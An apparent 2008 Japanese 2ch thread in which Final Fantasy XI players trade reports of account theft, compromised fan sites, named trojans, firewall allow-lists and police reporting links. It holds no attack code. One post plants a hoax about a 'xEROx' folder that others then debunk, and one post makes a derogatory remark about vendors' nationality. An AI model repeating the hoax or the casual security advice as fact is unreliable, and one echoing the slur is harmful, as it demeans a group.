198既にその名前は使われています:2008/08/14(木) 22:52:41 ID:9Ue13LDY
>>187
かんけーねー
馬鹿はパソコンしないそれだけ。
馬鹿は携帯いじくって遊んでるよ
199既にその名前は使われています:2008/08/14(木) 23:04:53 ID:zQGTa+ds
>>192 おいおい垢売りしぶってきてるってどこ見ていってんだよw
200既にその名前は使われています:2008/08/14(木) 23:13:01 ID:WWu0wgQd
>>198
おいばかやめろ。携帯厨=スイーツで
スイーツのバックには鬼女板がいるんだから、争い事に持っていくな。
毎日みたいに消されたいか?
201既にその名前は使われています:2008/08/14(木) 23:14:26 ID:fvuyNtod
業者サイト覗くのさえリスク伴うから渋りもするだろ
「RMT業者が垢ハックしてる」って認識だろうし
なんか、必死な業者混ざってる悪寒
202既にその名前は使われています:2008/08/14(木) 23:50:20 ID:EnO+gkIF
>>201
業者は何時だって必死さ。
なんたって人命より金の方が重い人種なんだからな。
必死になってようやく生活できるクズ国だからしょうがない。
(さらに>>>>>>越えられない万里の長城>>>>>>国の面子だからタチが悪い)
203既にその名前は使われています:2008/08/15(金) 00:08:35 ID:REdBSRMf
POL以外ではPC操作もFF上でも普通に動くのに
不自然にPOLの画面でだけマウスが効かずにクリックできなくなる
新種のパス抜きウィルスかと思ったけどそれらしい報告も無いな・・・
204既にその名前は使われています:2008/08/15(金) 00:10:16 ID:INa/o3rB
オプションでハードウェアカーソルキーだかなんだかにチェックはずれてんじゃね
205既にその名前は使われています:2008/08/15(金) 00:16:29 ID:D2s4LUm3
>>204
それFFの設定だしPOLとは関係ないんじゃないかな?
206既にその名前は使われています:2008/08/15(金) 00:28:27 ID:tBGBx2Km
俺が帰省してる間にまたヤバい事把握
207既にその名前は使われています:2008/08/15(金) 00:49:46 ID:DqKLF9ce
なんでもかんでもウイルスの仕業ですか?
そう思うならまずPC内スキャンしなよ
使ってる物以外のオンラインスキャンとかもつかってさ〜
ただ動かん、何?ってこれじゃ答えようがないって思わない?
208既にその名前は使われています:2008/08/15(金) 01:47:44 ID:du3tdCCK
だって自動更新にしてるのにWindowsupdateが16個更新着てたウイルスですか?って人がいるくらいだしな

自分の個人情報や金がかかってるんだから少しは危機感もてといいたいがな・・・
209既にその名前は使われています:2008/08/15(金) 02:35:42 ID:F/4bMvln
>>207
んでお前は何しにこのスレ来てんの??
POLだけおかしいなら報告としては十分だが?
スレ違いはお前なんだよ低脳w
210既にその名前は使われています:2008/08/15(金) 03:15:18 ID:gF4fsDTE
ffxiweb■com見に行ったら1iveが居るんだけどさ…
211既にその名前は使われています:2008/08/15(金) 03:27:39 ID:NCkPyU0K
■アカウントハックされた奴は最寄の警察に行って被害届けを出そう!
 不正アクセスに増加に伴い親身になって対応してくれるようになったぞ!


※最近業者が行っても無駄だの馬鹿にされるだの
  逮捕されないために必死になってるので注意!


警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。


212既にその名前は使われています:2008/08/15(金) 03:29:12 ID:SM0siTRs
>>211
>>13
電話くらい先にやってからいこうな
213既にその名前は使われています:2008/08/15(金) 03:30:44 ID:tWFH689M
>>210
>>107にあるのと同じものをフッタ部分に確認。
何でこのサイトはスクリプト書き込まれた事実を書いてないんだ・・・。
無責任じゃねえ?
214既にその名前は使われています:2008/08/15(金) 03:35:07 ID:gF4fsDTE
>>213
やっぱ酔って見間違えた訳じゃないのか
>>60で一度修復してるから再度やられたとしか思えん
215既にその名前は使われています:2008/08/15(金) 03:35:54 ID:yWaZRntF
>>212
業者お疲れさーん
216既にその名前は使われています:2008/08/15(金) 04:14:57 ID:XMD3NYkq
>>213
スクリプト削除して知らん振りしとけば問題ないと思ってるんだろう。
自分のサイトがウィルスまき散らしてた以上、利用者に告知をしておくのは最低限の義務だろうにね。

再度書き換えの原因はxreaのサポート板で書かれてたXOOPSスクリプトの脆弱性を突かれてる、ってとこ?
217既にその名前は使われています:2008/08/15(金) 04:29:07 ID:roCMppJx
告知はしたほうがいいけど
別に義務でもなんでもないな
218既にその名前は使われています:2008/08/15(金) 04:58:13 ID:SwlXe5A8
有料サービスでも何でもない一個人サイトに、自分のPCのセキュリティ欠陥を責任転嫁する。
一言目二言目には義務だの責任だの、そんな流れはいつものこと。

そういう他人任せな輩に限って、自分ではサイト管理者に連絡取って警告促す云々なんてまず
しない、責任も他人、注意喚起も他人、俺様はお客様で被害者だ、お前等が責任果たせ、
てないつもの流れ。
219既にその名前は使われています:2008/08/15(金) 05:02:04 ID:ZR3Xa3bl
知り合いがvistaだから垢ハックされねーよwwwとか抜かしてたんだが
んなことねーよな?
確かにVistaだと垢ハック報告見たことないよーな気がするが。
220既にその名前は使われています:2008/08/15(金) 05:10:15 ID:hobU79gM
ここの報告の真偽なんぞ書いた本人しかわからない
今の所VISTAで動く検体は一つも提出されてない
まぁVISTAの場合カーネルが保護されてるからシステムを利用したハッキングは容易には出来ないってだけ
221既にその名前は使われています:2008/08/15(金) 05:14:16 ID:NojJVEUZ
適切に対策されたXP=適切に対策されたVista>>越えられない壁>>素のVista≒素のXP SP2
222既にその名前は使われています:2008/08/15(金) 06:03:05 ID:6mxEVhb7
PC版の人は大変だな
223既にその名前は使われています:2008/08/15(金) 06:07:11 ID:Bz8ACj7P
すみません。
FF専用パソにするためのポートをもう一回教えていただいていいですか?;;
224既にその名前は使われています:2008/08/15(金) 07:09:20 ID:uXsg3hPD
pc版大変だけどいろんあ得点あるんだよぉぉ
画面が広くなるしぃ明るくなるしぃ綺麗なるでしょw
そして色んなツール群wwww
225既にその名前は使われています:2008/08/15(金) 07:36:50 ID:e8Qomc+f
>>223
テンプレ>>14
■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
 現在、上記に該当する既知のものはwzcsvbxm.dllを使う3種のみです。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると
 設定が簡単になります。

空けているローカルポート TCP1024-65535 UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
226既にその名前は使われています:2008/08/15(金) 08:17:34 ID:DqKLF9ce
>>193
ツールを使ってるから
227既にその名前は使われています:2008/08/15(金) 08:45:02 ID:g8/Iv4y7
インターフェースが見つかりませんエラー

怪しいのでウイルスバスター消して火スペインスコ

Trojan-GameThief.Win32.WOW.bht 駆除

POLのPW変更

何故かフルスキャンで再度見つかる

今度は駆除とちゃんと出ない

大丈夫なのかなと思いログインしてみる

その1時間後に垢ハック

きれいに現金だけ抜かれる
228既にその名前は使われています:2008/08/15(金) 09:11:01 ID:4F8Xum77
>>227
イランつっこみかもだが
>きれいに現金だけ抜かれる
仮想通貨ではなく、現金ですか?

その前の
>その1時間後に垢ハック
からするとクレカの番号盗まれたって事?
229既にその名前は使われています:2008/08/15(金) 09:11:24 ID:KAo8R96r
>>216
コード確認 ソースも見てみました。
検索で GETメソッド+hiddenフィールドつかってるから
セッションの盗聴のできるつくりになってる気がする。
+XOOPSのバージョンとサーバのphpの設定だろうねぇ・・・
警告出さないと 感染したの気づかない人大量に出そう。
230既にその名前は使われています:2008/08/15(金) 10:31:36 ID:J+D9gqgK
>>229
ググルと
「FFXiリンク」で1位
「FF11 リンク」で3位

やはり、検索上位サイトをダイレクトに狙ってるんかな・・
231既にその名前は使われています:2008/08/15(金) 10:37:41 ID:9ADfwdZL
>>227
駆除できてなかったor復元されただけでしょ?
んで業者はパス変更を見てウィルス気がつかれたかと思い、処理順番を上げてうまーできましたと

二回目は無いんだしテンプレでも埋めて報告してきっちり対策しようぜ
232既にその名前は使われています:2008/08/15(金) 10:54:23 ID:vVtYKeeO
保守
Flashplayer    Ver9.0.124.0にしよう!
Realplayer    使わないなら削除しよう!
WindowsUpdate   常に最新にしよう!
233既にその名前は使われています:2008/08/15(金) 10:58:39 ID:j4/bqDK2
>>224
アカ盗まれたらパァじゃん。
234既にその名前は使われています:2008/08/15(金) 11:13:38 ID:9ADfwdZL
>>233
PSとかのグラでやるなら引退でもいいって思うやつ多いと思うぞ?w
PCからはじめて友人宅ではじめてPSの画面見て別のゲームだとわかったし
235既にその名前は使われています:2008/08/15(金) 11:15:28 ID:lWgVh6ev
>>234
そうか?おれはWin>PS2に移ったがS端子で使えば特に不満はないが
PC空いて他の作業できることのほうが大きかった。
236既にその名前は使われています:2008/08/15(金) 11:28:57 ID:9ADfwdZL
まあそこらはフロントとバックのバッファ次第か
主観になるが自分は耐えられる範囲超えてたよw
237既にその名前は使われています:2008/08/15(金) 11:32:43 ID:JDKwDrbx
>>236
>まあそこらはフロントとバックのバッファ次第か
言いたいことは解るがなんか気持ち悪い言い回しだなw
238既にその名前は使われています:2008/08/15(金) 11:39:02 ID:JdDgXbsj
つまり、PS2しか知らずPS2でしかやってない私はある意味幸せ?
239既にその名前は使われています:2008/08/15(金) 12:10:07 ID:KAo8R96r
FFXI Web Potal のトップ 
>FFXI Web Potal 管理人じゅんたるです。

>リニューアルに伴い、ホームページをいったん閉鎖させていただきます。
>ご迷惑をおかけいたしますが、よろしくお願いいたします。

>2008年8月15日(金曜日)

踏んだ人に警告なしですか・
240既にその名前は使われています:2008/08/15(金) 12:14:16 ID:tZEoseJE
>>238 うむ 自分もPSからPCに換えて暫くは
PSもなかなかいいじゃないか?って思ってた
PCに慣れるともう戻れなくなる
PSも使う気ならPCには手を出さないのが吉だと思う

241既にその名前は使われています:2008/08/15(金) 12:26:50 ID:SM0siTRs
>>215
昔警察に行った被害者ですがな。
いきなり凸したら逆に嫌な思いをすることになりかねんよ。
242既にその名前は使われています:2008/08/15(金) 12:33:55 ID:QOdL4Shn
先にハイテク犯罪?に電話してから、最寄りの署がいいってテンプレにあったな
243既にその名前は使われています:2008/08/15(金) 12:34:53 ID:roCMppJx
>>239
自分がハッカーに攻撃されてるっぽいからとりあえず閉鎖しとくかって感じですかね。

> 危険なドメインに誘導すると思われるスクリプトが埋め込まれています。
と言われても知識の無い人には何がなんだかわからないのでは。
まず誰がどんな危険に晒されているのかを彼に理解させるとこから始めるべきかも。
244既にその名前は使われています:2008/08/15(金) 12:39:36 ID:3aShYCr2
wuが失敗する。。。
245既にその名前は使われています:2008/08/15(金) 12:42:21 ID:ITkts8qi
>>244
アップデートの後はしばらく混雑するけど、2〜3回やり直してもダメっぽい?
246既にその名前は使われています:2008/08/15(金) 12:44:40 ID:JdDgXbsj
>>244
自動更新が有効になっているのなら
>121みたいなことかもしれないけど、まあがんばれ?
247既にその名前は使われています:2008/08/15(金) 13:07:42 ID:7I7hZCtW
やべぇ 何かログイン出来ない・・・ orz
248既にその名前は使われています:2008/08/15(金) 13:12:23 ID:yWaZRntF
不正アクセスは警視庁まで

http://www.npa.go.jp/cyber/
249既にその名前は使われています:2008/08/15(金) 13:14:49 ID:7I7hZCtW
課金してない別垢でサーチしても存在確認出来ない・・・ これは垢ハック確定?
250既にその名前は使われています:2008/08/15(金) 13:15:13 ID:8cPRIcLI
県警では既に不正アクセスに関する専門の対策室ができております
泣き寝入りは絶対ダメ!お気軽にご相談を。

http://www.npa.go.jp/cyber/localpolice/index.html
251既にその名前は使われています:2008/08/15(金) 13:16:32 ID:0vU9mZoZ
>>248
細かい突っ込みだけど警察庁ねw
警視庁と警察庁は全く別物だからね。
252既にその名前は使われています:2008/08/15(金) 13:20:33 ID:iI+fP0WI
業者に利用されまくってるんだから、ハック祭が収まるまでサーバー移動サービス中止すれば良いのに ><;
253既にその名前は使われています:2008/08/15(金) 13:22:45 ID:k6XG7TrH
■e<業者もお客さまです^^
254既にその名前は使われています:2008/08/15(金) 13:28:42 ID:3aShYCr2
アカハックを受けて、一昨日クリーンインストールしたばっかりなのに・・・
マルウエアが見つかったぜ。。。
255既にその名前は使われています:2008/08/15(金) 13:29:51 ID:roCMppJx
警視庁って他県でいうところの県警みたいなもんだよな
256既にその名前は使われています:2008/08/15(金) 13:36:31 ID:zn1zHexQ
被害届けとして受理してくれない場合でも、
安全相談として受け付けてくれるし、捜査もしてくれる。
届けが多ければ多いほど被害対策等々しやすくなると思われるので、
警察には積極的に連絡したほうがいい。

警察庁 インターネット安全・安心相談
http://www.cybersafety.go.jp/nwqa/TopPageServlet
257既にその名前は使われています:2008/08/15(金) 13:57:50 ID:J+D9gqgK
>>239
いったん閉鎖では、ハッキングの仕方の詳細がわかってない以上
放置中にのっとられる可能性もあるよね。
データをおいてあるサーバとドメインをいったん分離するなりしないと、
しばらくの間はググッて来くる人に感染させる可能性もありうる。
やっぱ、一度でもハックされたらデータをおいてあるサーバだけでも変えるべきかな?
258既にその名前は使われています:2008/08/15(金) 14:01:10 ID:ahkCpDkM
クリーンインストールする前に↓のSP3のCD作っておいてネットワークケーブル外して
クリーンインストール、即SP3適用、ネットに繋いでパッチ適用、セキュルティソフトインスコ更新
とかにしたほうがいいんじゃないかすら?
http://www.microsoft.com/downloads/details.aspx?FamilyID=2fcde6ce-b5fb-4488-8c50-fe22559d164e&DisplayLang=ja
259既にその名前は使われています:2008/08/15(金) 14:04:17 ID:7I7hZCtW
ぬぉ KarnaeghDrv.dll ってのが入ってた・・・ orz
260既にその名前は使われています:2008/08/15(金) 14:09:34 ID:3aShYCr2
>>258
THX、さっそくやってみる
誰かが言っていたが、クリーンインストール繰り返すと快感なるらしいね
やだよ、そんな境地w
261既にその名前は使われています:2008/08/15(金) 14:27:08 ID:SM0siTRs
>>259
アウアウです
金曜だから急いで手続き始めたほうがいいよ
262既にその名前は使われています:2008/08/15(金) 14:36:13 ID:9ADfwdZL
まずpsとかboxあるならそっちでパス変えたほうがいいぞ
リアル知り合いいるならそっちからでもいいし
263既にその名前は使われています:2008/08/15(金) 14:52:46 ID:JsQBhKoN
>>259
俺も先週踏んだからそのファイル探してるんだけど、system32フォルダ中に
隠しファイルとかじゃなくて普通に入ってたのかね?
264既にその名前は使われています:2008/08/15(金) 14:53:19 ID:YZS8ymwK
>>225
ありがとう;;;
265既にその名前は使われています:2008/08/15(金) 14:57:22 ID:4Btey1VW
xreaってsakuraと関係あったような気がしたのか
↓の範囲もブロックしてるのですが、必要ありませんか?

SAKURA Internet Inc.:59.106.0.0-59.106.0.255
SRS SAKURA Internet Inc.:202.181.96.0-202.181.107.255
SRS SAKURA Internet Inc.:202.222.31.0-202.222.31.255
SAKURA Internet Inc.:210.188.219.0-210.188.219.255
266既にその名前は使われています:2008/08/15(金) 14:58:56 ID:k6XG7TrH
>>263
隠しだと見つけられないとかのが問題じゃね?
267既にその名前は使われています:2008/08/15(金) 15:21:30 ID:JsQBhKoN
>>266
まぁそうなんですがね。。いちよー最初のテンプレにある.dllとKarnaeghDrv.dllを探した
んだけど全然見つからない、、がFF11マップサイトを踏んだ事には踏んでるので
どっちにしてもクリーンインストールするまで安心できないな。
268既にその名前は使われています:2008/08/15(金) 15:30:01 ID:TVPFM1z8
ノートンの隔離ファイル削除ってどーやるんだっけ?
ふと思い立ってカスペのオンラインスキャンしたら数件HITして
終わるまで気が気じゃなかったが結果的に隔離ファイルだったもんで
消しちまいたいがヘルプ軽く読んでもわからんかった

しっかり読めって?
269既にその名前は使われています:2008/08/15(金) 15:33:08 ID:UdtF/CMy
>>259
すぐに凍結手続きを。
270既にその名前は使われています:2008/08/15(金) 15:39:51 ID:HSYkMwSE
age
271既にその名前は使われています:2008/08/15(金) 15:44:27 ID:DLC2GCnG
スタート → マイコンピューター → ローカルディスク →プログラムファイル の一番下にxEROxというのがあったら既に手遅れです
272既にその名前は使われています:2008/08/15(金) 15:49:05 ID:2FOBiNy3
>>268
メインウィンドウの左側にある[履歴の表示]をクリック↓
[表示の選択]ドロップダウンリストで[検疫]を選択↓
セキュリティ履歴の検疫表示で処理を実行したい項目を選択↓
右ペインで[詳細]をクリック↓
[処理]で実行したい処理を選択(オプションは下のみっつ)↓

  [リスクの復元]
  選択した項目を修復しないで元の場所に戻す
 [履歴から削除]
 選択した項目をセキュリティ履歴ログから削除
 [シマンテック社に提出]
 選択した項目をシマンテック社に送信

ついでに、履歴から削除した隔離ファイルはゴミ箱に移動しますから
ゴミ箱もカラにしておくのがいいです
273既にその名前は使われています:2008/08/15(金) 15:49:27 ID:BlcUSmo2
>>268
しっかり嫁
274既にその名前は使われています:2008/08/15(金) 15:55:45 ID:TVPFM1z8
>>272
さんきう、愛してるぜ

>>273
おまいも愛してやろうw
275既にその名前は使われています:2008/08/15(金) 15:56:37 ID:cBJvVe6y
プログラムファイルにxEROxあった場合は
OSからアンインストールしないと駄目そうかな?
276既にその名前は使われています:2008/08/15(金) 15:58:46 ID:/0/DtWc7
>>275
削除できない場合は深く潜りこんでるのでアンインスコが必要です
そして削除できない場合は既にパスは流失していると思われます
277既にその名前は使われています:2008/08/15(金) 15:58:46 ID:L5toPeDB
この流れはマジレス禁止なのか
278既にその名前は使われています:2008/08/15(金) 16:00:59 ID:cBJvVe6y
>>276
削除出来ない・・orz
アドバイスありがとう、アンインスコして
パス変えるわ・・・
279既にその名前は使われています:2008/08/15(金) 16:01:31 ID:k6XG7TrH
>>275
jdbgmgr.exeという熊がいたら感染
ttp://www.ipa.go.jp/security/topics/alert140515.html
みたいなデマだ、真に受けるなよ。
ttp://www.fujixerox.co.jp/release/2001/1228_nwwia.html
280既にその名前は使われています:2008/08/15(金) 16:02:03 ID:KbyvmRc3
>>278
おまえ・・だまされてるのに気づけよ・・ぐぐってみろ・・
281既にその名前は使われています:2008/08/15(金) 16:03:09 ID:PM2+BHj5
>>271
ttp://www.tef-room.net/trouble/xerox.html
これじゃなくて、マジでウィルスいるうんか?
282既にその名前は使われています:2008/08/15(金) 16:03:18 ID:ttmdzMk1
>>275
嘘だからだまされるなよw
283既にその名前は使われています:2008/08/15(金) 16:03:55 ID:PM2+BHj5
今リロードしたw
284既にその名前は使われています:2008/08/15(金) 16:04:09 ID:D2s4LUm3
本当にxEROxフォルダなら怪しさ大爆発
xeroxフォルダならXP標準
285既にその名前は使われています:2008/08/15(金) 16:04:17 ID:roCMppJx
こんなネタ真に受けてるならセキュリティも笊だろうから
やっぱりクリーンインストールしたほうがいいんじゃないかな
286既にその名前は使われています:2008/08/15(金) 16:07:45 ID:cBJvVe6y
>>284
xeroxだった、すまない知識乏しくてorz
>>285
セキュリティソフトはカスペ友達に勧められて使ってて
今の所検知なしかなー
287既にその名前は使われています:2008/08/15(金) 16:11:24 ID:7I7hZCtW
>>263
ごめんなさい。ベランダで日焼けしてた。
全部表示にして検索かけたから不明。

ウィルスバスターではひっかからないんだなぁ。
気が付く直前にウィルスチェックしたばっかなのに・・・

ちくしょ〜 11系のサイトは一切見てなかったんだけどなぁ・・
ネットこえぇよ〜 (;´д⊂)
288既にその名前は使われています:2008/08/15(金) 16:36:33 ID:ttmdzMk1
> ベランダで日焼けしてた。
なんだこれはw
289既にその名前は使われています:2008/08/15(金) 16:42:11 ID:k6XG7TrH
>>287 は布団
290既にその名前は使われています:2008/08/15(金) 16:50:34 ID:JsQBhKoN
俺もPCが家に来たばっかの頃エロサイトとか見たりした事あったし
xeroxにはびびらされたもんだw
291既にその名前は使われています:2008/08/15(金) 17:00:02 ID:4F8Xum77
「Windows Update」のエラー報告が急増中、原因はウイルス
ttp://itpro.nikkeibp.co.jp/article/NEWS/20080814/312758/
「Windows UpdateやMicrosoft Updateのサイトにアクセスして
更新プログラムを適用しようとすると、『0x8DDD0018』あるいは
『1058』といったエラー番号ともに、
『必要なサービス アプリケーションが
無効になっているため、Windows Update を続行できません』
といったエラーメッセージが表示される」
292既にその名前は使われています:2008/08/15(金) 17:03:50 ID:k6XG7TrH
XREAトロイ、深夜に更新されていたみたい。
ttp://www.virustotal.com/analisis/9eaa00549133a784be795e360dd56c9e
今回はNortonとBitDefenderががんばりました。
293既にその名前は使われています:2008/08/15(金) 17:06:13 ID:8oSnsHDf
先日アカウントハックされたんだが
カスペルのオンラインスキャンとかAVGでのスキャン
spybotでのスキャンでもそれらしいものがひっかからなかった、、、
痕跡ものこらないものもあるん?こういうの疎くて;;
294既にその名前は使われています:2008/08/15(金) 17:06:44 ID:JsQBhKoN
>>287
日焼けw
俺もウィルスバスターだけどカスペルスキーかけたら何かしらウィルスあったりする事あったしなぁ、、、
FF系みてなくてそれは怖いな
295既にその名前は使われています:2008/08/15(金) 17:08:13 ID:k6XG7TrH
オンラインスキャンはあくまでブラウザから動かす物なので
変なの(rootkit等)がシステムに食い込んだまま
起動したWindowsからではまず検知できないっすよ。
296既にその名前は使われています:2008/08/15(金) 17:14:11 ID:7I7hZCtW
今チャットサポートにアクセス中・・・
297既にその名前は使われています:2008/08/15(金) 17:16:38 ID:7I7hZCtW
あれ・・ 反応しなくなった
Connection closed due to network problems.
で止まったけど切れたのかな?w
298既にその名前は使われています:2008/08/15(金) 17:17:24 ID:k6XG7TrH
>>297
うん。
299既にその名前は使われています:2008/08/15(金) 17:17:52 ID:HX8S1gEr
>>296
どんな環境で食らったのか教えてくれまいか
できれば>>6のテンプレに沿って
300既にその名前は使われています:2008/08/15(金) 17:18:26 ID:7I7hZCtW
ちくそ〜 (;´д⊂)
>>298
さんくす〜
301既にその名前は使われています:2008/08/15(金) 17:19:15 ID:7I7hZCtW
>>299
ちと待ってて
先に垢をどうにかしてくる
302既にその名前は使われています:2008/08/15(金) 17:19:53 ID:HX8S1gEr
>>301
ありがとう
余裕出来てからでいいお 
303既にその名前は使われています:2008/08/15(金) 17:35:56 ID:jmS0ivW/
今まで何人がハックされたんだろうな
住所や名前がムーミンパパで何も手出しできなくてそのまま業者キャラとして
使われてる場合や、モチベ消えて引退も考えると
トータルで何人がヴァナを去っていったんだろう
リアルに■eの被害総額結構いってそうだが。ユーザー喪失と言う意味で
表面上の被害者人数だけでも公開は・・・まあスクエニはしねえだろうけどもw
すれば多少は注意喚起になると思うけどな
304既にその名前は使われています:2008/08/15(金) 17:36:28 ID:7I7hZCtW
とりあえずキャラ確認してきた

きっちしエクレア以外なくなってる orz
305既にその名前は使われています:2008/08/15(金) 17:37:19 ID:8oSnsHDf
もしかしてテンプレのまとめサイトのxreaがアドレスにはいってるほうって
今でも踏むと危険?
306既にその名前は使われています:2008/08/15(金) 17:40:02 ID:/B3Ri8bQ
>>304
ん?新しいパスワードは発行してもらえたの?もうGMに繋がったの?
307既にその名前は使われています:2008/08/15(金) 17:42:16 ID:jmS0ivW/
LSコミュ?
308既にその名前は使われています:2008/08/15(金) 17:50:28 ID:HX8S1gEr
>>304
(´;ω;`)
309既にその名前は使われています:2008/08/15(金) 17:55:37 ID:7I7hZCtW
不正アクセス専用チャットサポートで本人確認後、即発行してくれた。
310既にその名前は使われています:2008/08/15(金) 17:57:00 ID:8oSnsHDf
う、、、今カスペルのオンラインスキャンでメモリスキャンしたら
KarnaeghDrv.dllに感染してるものが7つでてきたorz
さっきttp://miku.xrea.jp/を開こうとしたからなのか、それとも前に感染してたのか、、
こいつのせいなのかなぁ 
311既にその名前は使われています:2008/08/15(金) 17:57:06 ID:/B3Ri8bQ
そか、対応速くてよかったねー。
312既にその名前は使われています:2008/08/15(金) 17:57:51 ID:k6XG7TrH
>>310
そこはやられてないよ。前に別なとこで踏んだんでしょ。
313既にその名前は使われています:2008/08/15(金) 18:00:20 ID:oas3FWe4
>>303
■にはたいした被害はないんじゃない
ユーザーなんて腐るほどいるし深刻になるほど減ってはいないと見た
しいて言えばパス抜かれたバカどもの尻拭いくらいじゃないか
314既にその名前は使われています:2008/08/15(金) 18:03:13 ID:8oSnsHDf
>>312
やはりそうか、KarnaeghDrv.dllってAVGじゃひっかからないか、、
カスペルのトライアルいれてけしてみます
315既にその名前は使われています:2008/08/15(金) 18:10:48 ID:7I7hZCtW
>>6のテンプレの回答
●今日昼
●FF系は無し
●No
●半年くらい前から手打ち
●半年くらい前に変更
●No
●No
●No
●XP pro SP2
●IE 7.0.5730.13
●8月12日
●Flash 9.0.124.0   Realは無し
●ウイルスバスター2007 プログラム 15.30.1128  検索エンジン 8.710.1002   パターンファイル 5.479.00
●なし
●手動でKarnaeghDrv.dllを発見しただけでカスペルはまだ  ウイルスバスターは何もひっかからない
●半年くらい前に読んだっきり
●よくわからない (;´д⊂)
●同上
●特に変な症状はないかなぁ・・?
316既にその名前は使われています:2008/08/15(金) 18:16:41 ID:7I7hZCtW
引越し直後だったから、とりあえず繋げたって状態で
ルータ外してたのがまずかったかなぁ・・

とりあえずカスペルで検索してみます
317既にその名前は使われています:2008/08/15(金) 18:16:57 ID:du3tdCCK
ハックされてるのにクリーンインスコしないなんてつわものだな
318既にその名前は使われています:2008/08/15(金) 18:17:01 ID:mASo62A9
わかりにくいわw
319既にその名前は使われています:2008/08/15(金) 19:01:31 ID:skCOKTze
先日垢ハックされて現在凍結中です。

カスペルスキーでスキャンしたところ
Trojan-GameThief.Win32.WOW.bht
が見つかったんですが、どうやって駆除したらよいのでしょうか?

こういうの苦手でどうやっていいかわからないっす・・・
320既にその名前は使われています:2008/08/15(金) 19:03:18 ID:ITkts8qi
わからないならクリーンインストール
パッチ当たるまで他サイトを見に行かないように。

というかクリーンインストールしないと安心できないだろうしね。
321既にその名前は使われています:2008/08/15(金) 19:06:30 ID:skCOKTze
>>320
ありがとうございます。
やってみます。
322既にその名前は使われています:2008/08/15(金) 19:20:49 ID:jmS0ivW/
>315
flash最新でハックされたの?
推測だけどブラウザのスクリプト系は全部オンのままかねやっぱ
今のは症状何も出ないのだろうか
323既にその名前は使われています:2008/08/15(金) 19:24:14 ID:5GyIwlZK
>>322
flashの脆弱が発表されてすぐ最新にしたけど感染したわ
324既にその名前は使われています:2008/08/15(金) 19:30:29 ID:ITkts8qi
多分、対策前にやられたんじゃないのかね。

最近の動向を見るに、業者がかなり本腰を入れてパス抜きしてるしな。
325既にその名前は使われています:2008/08/15(金) 19:30:51 ID:9uXTswmp
カスペみたら
検地しましたリスクウェアInvader
ってあったんだがどうやって削除するんだ・・・助けて・・・・
326既にその名前は使われています:2008/08/15(金) 19:31:28 ID:9uXTswmp
すべて駆除するがなぜか選べない・・・・
327既にその名前は使われています:2008/08/15(金) 19:35:05 ID:JDKwDrbx
>>325
アラートの内容しっかり書かないと誰もわけわかんないよー。
328既にその名前は使われています:2008/08/15(金) 19:36:24 ID:jmS0ivW/
>>323
詳しく教えてくれないと分からんけど
それ前のfc2とか別経由だったんじゃねえの
329既にその名前は使われています:2008/08/15(金) 19:38:18 ID:9uXTswmp
>>327
検知しました: リスクウェア Invader プロセスを実行します: C:\WINDOWS\system32\svchost.exe

これでいいのかな?
330既にその名前は使われています:2008/08/15(金) 19:39:45 ID:JDKwDrbx
>>329
それがPOL起動したときにアラートでてくるのーん?
331既にその名前は使われています:2008/08/15(金) 19:42:25 ID:9uXTswmp
>>330
いやPOL起動した時にでてこないけどなんでか今カスペ見たらあったんだ
332既にその名前は使われています:2008/08/15(金) 19:42:40 ID:JDKwDrbx
>>323
それって具体的にいつ頃の話かなー。FlashPlayer更新したの。
333既にその名前は使われています:2008/08/15(金) 19:44:39 ID:JDKwDrbx
>>331
カスペルさんのログにあったってこと?
334既にその名前は使われています:2008/08/15(金) 19:44:54 ID:7I7hZCtW
>>322
Flashの最新版は一度インした後の自動アップデートでした。
インしてから12時間後くらい。
6月末からインしてなくて、最初のインでパスを手動入力。
その後からはソフトウェアキーボードで入力。

>>317
ん〜 11系のサイト見てなくても感染しちゃうとなると、ど〜して
よいやらといった心境・・・ 
elemenは見たかもだけど、これが原因だとやばいもんなぁ。
あとでクリーンインストールします。
335既にその名前は使われています:2008/08/15(金) 19:45:59 ID:9uXTswmp
>>333
そうです
これはかなりやばいでしょうか?・・・
336既にその名前は使われています:2008/08/15(金) 19:46:11 ID:PntCHrPq
エレメンも危ないよ
有名所が狙われてる状況だし
337既にその名前は使われています:2008/08/15(金) 19:47:22 ID:7I7hZCtW
うわ〜 そうなのかぁ・・
338既にその名前は使われています:2008/08/15(金) 19:48:42 ID:ITkts8qi
もはやどこにも安全な所はないよ。
339既にその名前は使われています:2008/08/15(金) 19:51:31 ID:JDKwDrbx
>>335
POL起動時にPOL.exeに対してsvchostが突付きにきたってんならほぼ感染確定といっていいかもだけど。
そのアラート出たときの状況も解らなければなんともいえないなー。
340既にその名前は使われています:2008/08/15(金) 19:55:18 ID:9nyfMAb9
今垢凍結中なんですが
ビューアー起動して2垢目でちょろっと遊ぼうと思ってたら
ログインもしてないのにプレイオンラインビューアーが突然VUされますた。
こういう症状の人いませんか?
341既にその名前は使われています:2008/08/15(金) 19:57:06 ID:zL49syk2
自動ログインになってたんじゃね
342既にその名前は使われています:2008/08/15(金) 19:57:29 ID:uyR8JDwT
>>334
6月末〜最初のインの間のネット利用は?
あと「最初のイン」ってのはいつごろかな
343既にその名前は使われています:2008/08/15(金) 19:58:55 ID:oas3FWe4
POLはログイン前にVUしなかったか?
344既にその名前は使われています:2008/08/15(金) 19:59:52 ID:9uXTswmp
>>339
まじですか・・・
駆除方法もわからないといことですよね
明日クリーンインストールするか・・・
345既にその名前は使われています:2008/08/15(金) 20:00:16 ID:XPhIGcye
IDPASS間違えててもPOLのVUPは開始されるな
346340:2008/08/15(金) 20:03:08 ID:9nyfMAb9
起動直後にいつもと違う画面でVUしますか?って感じでなって
